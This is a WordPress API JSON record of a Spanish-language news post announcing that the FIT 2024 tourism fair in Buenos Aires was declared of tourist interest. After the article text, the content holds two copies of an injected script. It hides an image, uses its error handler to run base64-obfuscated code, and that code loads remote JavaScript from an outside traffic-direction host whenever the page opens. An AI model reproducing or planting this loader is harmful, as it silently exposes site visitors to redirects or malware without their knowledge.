{"id":4223,"date":"2024-07-25T13:11:49","date_gmt":"2024-07-25T16:11:49","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4223"},"modified":"2025-08-13T23:52:13","modified_gmt":"2025-08-14T02:52:13","slug":"fit-2024-declarada-de-interes-turistico-por-la-secretaria-de-turismo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4223","title":{"rendered":"FIT 2024 Declarada de Inter\u00e9s Tur\u00edstico por la Secretar\u00eda de Turismo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-c2b0f2a1824df8ee0437262a7b8dc4e1\" style=\"background-color:#890808\"><em>La XXVIII Feria Internacional de Turismo de Am\u00e9rica Latina (FIT 2024) ha sido oficialmente declarada de Inter\u00e9s Tur\u00edstico por la Secretar\u00eda de Turismo. Este reconocimiento subraya la importancia y el impacto de nuestro evento en la promoci\u00f3n y el desarrollo del sector tur\u00edstico en toda la regi\u00f3n.<\/em><\/h4>\n\n\n\n<h4 class=\"wp-block-heading\">Un Evento Clave para el Turismo en Am\u00e9rica Latina<\/h4>\n\n\n\n<p>La<strong>&nbsp;FIT 2024<\/strong>&nbsp;se llevar\u00e1 a cabo del&nbsp;<strong>28 de septiembre al 1\u00b0 de octubre de 2024<\/strong>&nbsp;en el emblem\u00e1tico&nbsp;<strong>Predio Ferial La Rural<\/strong>, en la Ciudad Aut\u00f3noma de Buenos Aires. Este evento re\u00fane a prestadores locales e internacionales, ofreciendo una plataforma \u00fanica para la promoci\u00f3n y generaci\u00f3n de negocios. La feria no solo impulsa la econom\u00eda de los destinos participantes, sino que tambi\u00e9n facilita la creaci\u00f3n de alianzas estrat\u00e9gicas y la exposici\u00f3n de ofertas tur\u00edsticas a una audiencia diversa.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Impacto Econ\u00f3mico y Profesional<\/h4>\n\n\n\n<p>En la edici\u00f3n de 2023, la FIT cont\u00f3 con la participaci\u00f3n de 1.819 expositores de 45 pa\u00edses, y fue visitada por 39.506 profesionales de la industria del turismo y 87.986 visitantes del p\u00fablico general. Estas cifras destacan la magnitud y relevancia del evento en el \u00e1mbito tur\u00edstico.<\/p>\n\n\n\n<p>Dentro de los pabellones de la feria, se realizar\u00e1n rondas de negocios, donde operadores extranjeros y locales se reunir\u00e1n con expositores para explorar oportunidades comerciales. Adem\u00e1s, se llevar\u00e1n a cabo seminarios y charlas con expertos de la industria, abordando temas como la tecnolog\u00eda aplicada al turismo, ofreciendo a los participantes conocimientos valiosos y actuales.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Motor de la Actividad Econ\u00f3mica<\/h4>\n\n\n\n<p>Como un componente vital del segmento de turismo de reuniones, la&nbsp;<strong>FIT 2024<\/strong>&nbsp;es un motor significativo para la actividad econ\u00f3mica. El evento no solo impulsa el gasto tur\u00edstico y apoya la transformaci\u00f3n y desarrollo de las ciudades, sino que tambi\u00e9n genera empleo calificado y fomenta la profesionalizaci\u00f3n del capital humano. Adem\u00e1s, aumenta la estad\u00eda promedio de los turistas y estimula la demanda de otros negocios relacionados.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Promoviendo el Turismo en Argentina<\/h4>\n\n\n\n<p>La&nbsp;<strong>Direcci\u00f3n Nacional de Marketing y Promoci\u00f3n Tur\u00edstica<\/strong>&nbsp;ha respaldado esta declaraci\u00f3n, reconociendo que la&nbsp;<strong>FIT 2024&nbsp;<\/strong>contribuir\u00e1 significativamente a la promoci\u00f3n tur\u00edstica dentro de la Rep\u00fablica Argentina, aumentando la visibilidad y el conocimiento de sus diversas regiones.<\/p>\n\n\n\n<p>Agradecemos a la Secretar\u00eda de Turismo por este importante reconocimiento. Desde FIT, continuamos comprometidos en ofrecer una plataforma de excelencia para la promoci\u00f3n y el desarrollo del turismo en Am\u00e9rica Latina.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u00a1Nos vemos en FIT 2024!<\/h3>\n\n\n\n<p>No pierdas la oportunidad de ser parte de este evento de gran relevancia. Te esperamos del&nbsp;<strong>28 de septiembre al 1\u00b0 de octubre en La Rural, Buenos Aires<\/strong>, para descubrir, conectar y crecer juntos en la XXVIII Feria Internacional de Turismo de Am\u00e9rica Latina.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/fit.org.ar\/fit-2024-declarada-de-interes-turistico-por-el-ministerio-de-turismo\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/fit.org.ar\/24\/wp-content\/uploads\/2023\/09\/Fecha-1280x147.png\" alt=\"\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La XXVIII Feria Internacional de Turismo de Am\u00e9rica Latina (FIT 2024) ha sido oficialmente declarada de Inter\u00e9s Tur\u00edstico por la Secretar\u00eda de Turismo. Este reconocimiento subraya la importancia y el impacto de nuestro evento en la promoci\u00f3n y el desarrollo del sector tur\u00edstico en toda la regi\u00f3n. Un Evento Clave para el Turismo en Am\u00e9rica [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4224,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-4223","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4223"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4223"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4223\/revisions"}],"predecessor-version":[{"id":6733,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4223\/revisions\/6733"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4224"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4223"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4223"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4223"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}